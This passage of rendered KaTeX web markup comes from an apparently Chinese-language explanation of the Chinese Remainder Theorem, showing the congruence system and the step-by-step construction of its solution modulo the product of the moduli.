\pmod{n_2} \\\quad \vdots \\x \equiv a_k \pmod{n_k}\end{cases}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:6.252em;vertical-align:-2.876em;"></span><span class="minner"><span class="mopen"><span class="delimsizing mult"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:3.25em;"><span style="top:-1.366em;"><span class="pstrut" style="height:3.216em;"></span><span class="delimsizinginner delim-size4"><span>⎩</span></span></span><span style="top:-1.358em;"><span class="pstrut" style="height:3.216em;"></span><span style="height:1.216em;width:0.8889em;"><svg xmlns="http://www.w3.org/2000/svg" width="0.8889em" height="1.216em" style="width:0.8889em" viewBox="0 0 888.89 1216" preserveAspectRatio="xMinYMin"><path d="M384 0 H504 V1216 H384z M384 0 H504 V1216 H384z"/></svg></span></span><span style="top:-3.216em;"><span class="pstrut" style="height:3.216em;"></span><span class="delimsizinginner delim-size4"><span>⎨</span></span></span><span style="top:-4.358em;"><span class="pstrut" style="height:3.216em;"></span><span style="height:1.216em;width:0.8889em;"><svg xmlns="http://www.w3.org/2000/svg" width="0.8889em" height="1.216em" style="width:0.8889em" viewBox="0 0 888.89 1216" preserveAspectRatio="xMinYMin"><path d="M384 0 H504 V1216 H384z M384 0 H504 V1216 H384z"/></svg></span></span><span style="top:-5.566em;"><span class="pstrut" style="height:3.216em;"></span><span class="delimsizinginner delim-size4"><span>⎧</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:2.75em;"><span></span></span></span></span></span></span><span class="mord"><span class="mtable"><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:3.376em;"><span style="top:-6.0555em;"><span class="pstrut" style="height:3.6875em;"></span><span class="mord"><span class="mord mathnormal">x</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">a</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:0.4444em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mclose">)</span></span></span><span style="top:-4.6155em;"><span class="pstrut" style="height:3.6875em;"></span><span class="mord"><span class="mord mathnormal">x</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">a</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:0.4444em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mclose">)</span></span></span><span style="top:-2.6835em;"><span class="pstrut" style="height:3.6875em;"></span><span class="mord"><span class="mspace" style="margin-right:1em;"></span><span class="mord"><span class="mord">⋮</span><span class="mord rule" style="border-right-width:0em;border-top-width:1.5em;bottom:0em;"></span></span></span></span><span style="top:-1.2435em;"><span class="pstrut" style="height:3.6875em;"></span><span class="mord"><span class="mord mathnormal">x</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">a</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3361em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03148em;">k</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:0.4444em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3361em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03148em;">k</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:2.876em;"><span></span></span></span></span></span></span></span><span class="mclose nulldelimiter"></span></span></span></span></span></span></p><h2 id="三-过程"><a class="markdownIt-Anchor" href="#三-过程"></a> 三、过程</h2><p class="katex-block"><span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right left" columnspacing="0em"><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>计算所有模数的积：</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mi>n</mi><mo>=</mo><munderover><mo>∏</mo><mrow><mi>i</mi><mo>=</mo><mn>1</mn></mrow><mi>k</mi></munderover><msub><mi>n</mi><mi>i</mi></msub><mo>=</mo><msub><mi>n</mi><mn>1</mn></msub><mo>×</mo><msub><mi>n</mi><mn>2</mn></msub><mo>×</mo><mo>⋯</mo><mo>×</mo><msub><mi>n</mi><mi>k</mi></msub></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>对于第 </mtext><mi>i</mi><mtext> 个方程：</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><msub><mi>m</mi><mi>i</mi></msub><mo>=</mo><mfrac><mi>n</mi><msub><mi>n</mi><mi>i</mi></msub></mfrac></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>计算 </mtext><msub><mi>m</mi><mi>i</mi></msub><mtext> 在模 </mtext><msub><mi>n</mi><mi>i</mi></msub><mtext> 意义下的逆元 </mtext><msubsup><mi>m</mi><mi>i</mi><mrow><mo>−</mo><mn>1</mn></mrow></msubsup><mtext>：</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><msub><mi>m</mi><mi>i</mi></msub><mo>⋅</mo><msubsup><mi>m</mi><mi>i</mi><mrow><mo>−</mo><mn>1</mn></mrow></msubsup><mo>≡</mo><mn>1</mn><mspace></mspace><mspace width="1em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><msub><mi>n</mi><mi>i</mi></msub><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>计算 </mtext><msub><mi>c</mi><mi>i</mi></msub><mo>=</mo><msub><mi>m</mi><mi>i</mi></msub><msubsup><mi>m</mi><mi>i</mi><mrow><mo>−</mo><mn>1</mn></mrow></msubsup><mtext>（不要对 </mtext><msub><mi>n</mi><mi>i</mi></msub><mtext> 取模）：</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><msub><mi>c</mi><mi>i</mi></msub><mo>=</mo><msub><mi>m</mi><mi>i</mi></msub><mo>⋅</mo><msubsup><mi>m</mi><mi>i</mi><mrow><mo>−</mo><mn>1</mn></mrow></msubsup></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mtext>方程组在模 </mtext><mi>n</mi><mtext> 意义下的唯一解为：</mtext></mrow></mstyle></mtd></mtr><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow></mrow></mstyle></mtd><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mrow></mrow><mi>x</mi><mo>=</mo><munderover><mo>∑</mo><mrow><mi>i</mi><mo>=</mo><mn>1</mn></mrow><mi>k</mi></munderover><msub><mi>a</mi><mi>i</mi></msub><msub><mi>c</mi><mi>i</mi></msub><mspace></mspace><mspace width="1em"/><mo stretchy="false">(</mo><mrow><mi mathvariant="normal">m</mi><mi mathvariant="normal">o</mi><mi mathvariant="normal">d</mi></mrow><mspace width="0.3333em"/><mi>n</mi><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{aligned}&amp;\text{计算所有模数的积：} \\&amp;n = \prod_{i=1}^k n_i = n_1 \times n_2 \times \cdots \times n_k \\\\&amp;\text{对于第 } i \text{ 个方程：} \\&amp;m_i = \frac{n}{n_i} \\\\&amp;\text{计算 } m_i \text{ 在模 } n_i \text{ 意义下的逆元 } m_i^{-1}：\\&amp;m_i \cdot m_i^{-1} \equiv 1 \pmod{n_i} \\\\&amp;\text{计算 } c_i = m_i m_i^{-1} \text{（不要对 } n_i \text{ 取模）：} \\&amp;c_i = m_i \cdot m_i^{-1} \\\\&amp;\text{方程组在模 } n \text{ 意义下的唯一解为：} \\&amp;x = \sum_{i=1}^k a_i c_i \pmod{n}\end{aligned}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:25.6676em;vertical-align:-12.5838em;"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:13.0838em;"><span style="top:-16.0799em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:-13.5838em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:-11.1661em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:-9.6661em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:-7.8985em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:-5.9225em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:-4.3984em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:-2.8743em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:-1.3743em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:0.1498em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:1.6739em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:3.1739em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:4.6739em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span><span style="top:7.17em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:12.5838em;"><span></span></span></span></span></span><span class="col-align-l"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:13.0838em;"><span style="top:-16.0799em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">计算所有模数的积：</span></span></span></span><span style="top:-13.5838em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord mathnormal">n</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mop op-limits"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.8361em;"><span style="top:-1.8723em;margin-left:0em;"><span class="pstrut" style="height:3.05em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mrel mtight">=</span><span class="mord mtight">1</span></span></span></span><span style="top:-3.05em;"><span class="pstrut" style="height:3.05em;"></span><span><span class="mop op-symbol large-op">∏</span></span></span><span style="top:-4.3em;margin-left:0em;"><span class="pstrut" style="height:3.05em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03148em;">k</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2777em;"><span></span></span></span></span></span><span class="mspace" style="margin-right:0.1667em;"></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">1</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">2</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="minner">⋯</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3361em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03148em;">k</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span></span></span><span style="top:-9.6661em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">对于第</span><span class="mord"> </span></span><span class="mord mathnormal">i</span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">个方程：</span></span></span></span><span style="top:-7.8985em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mopen nulldelimiter"></span><span class="mfrac"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.1076em;"><span style="top:-2.314em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span></span></span><span style="top:-3.23em;"><span class="pstrut" style="height:3em;"></span><span class="frac-line" style="border-bottom-width:0.04em;"></span></span><span style="top:-3.677em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord mathnormal">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.836em;"><span></span></span></span></span></span><span class="mclose nulldelimiter"></span></span></span></span><span style="top:-4.3984em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">计算</span><span class="mord"> </span></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">在模</span><span class="mord"> </span></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">意义下的逆元</span><span class="mord"> </span></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8641em;"><span style="top:-2.433em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.113em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">−</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.267em;"><span></span></span></span></span></span></span><span class="mord cjk_fallback">：</span></span></span><span style="top:-2.8743em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">⋅</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8641em;"><span style="top:-2.433em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.113em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">−</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.267em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">≡</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord">1</span><span class="mspace allowbreak"></span><span class="mspace" style="margin-right:1em;"></span><span class="mopen">(</span><span class="mord"><span class="mord"><span class="mord mathrm">mod</span></span></span><span class="mspace" style="margin-right:0.3333em;"></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mclose">)</span></span></span><span style="top:0.1498em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">计算</span><span class="mord"> </span></span><span class="mord"><span class="mord mathnormal">c</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8641em;"><span style="top:-2.433em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.113em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">−</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.267em;"><span></span></span></span></span></span></span><span class="mord text"><span class="mord cjk_fallback">（不要对</span><span class="mord"> </span></span><span class="mord"><span class="mord mathnormal">n</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">取模）：</span></span></span></span><span style="top:1.6739em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord"><span class="mord mathnormal">c</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em;"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mbin">⋅</span><span class="mspace" style="margin-right:0.2222em;"></span><span class="mord"><span class="mord mathnormal">m</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8641em;"><span style="top:-2.433em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.113em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">−</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.267em;"><span></span></span></span></span></span></span></span></span><span style="top:4.6739em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord text"><span class="mord cjk_fallback">方程组在模</span><span class="mord"> </span></span><span class="mord mathnormal">n</span><span class="mord text"><span class="mord"> </span><span class="mord cjk_fallback">意义下的唯一解为：</span></span></span></span><span style="top:7.17em;"><span class="pstrut" style="height:3.8361em;"></span><span class="mord"><span class="mord"></span><span class="mord mathnormal">x</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em;"></span><span class="mop op-limits"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.8361em;"><span style="top:-1.8723em;margin-left:0em;"><span class="pstrut" style="height:3.05em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mrel mtight">=</span><span class="mord mtight">1</span></span></span></span><span style="top:-3.05em;"><span class="pstrut" style="height:3.05em;"></span><span><span class="mop op-symbol large-op">∑</span></span></span><span style="top:-4.3em;margin-left:0em;"><span class="pstrut" style="height:3.05em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight" style="margin-right:0.03148em;">k</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.2777em;"><span></span></span></span></span></span><span class="mspace" style="margin-right:0.1667em;"></span><span class="mord"><span class="mord mathnormal">a</span><span class="msupsub"><span 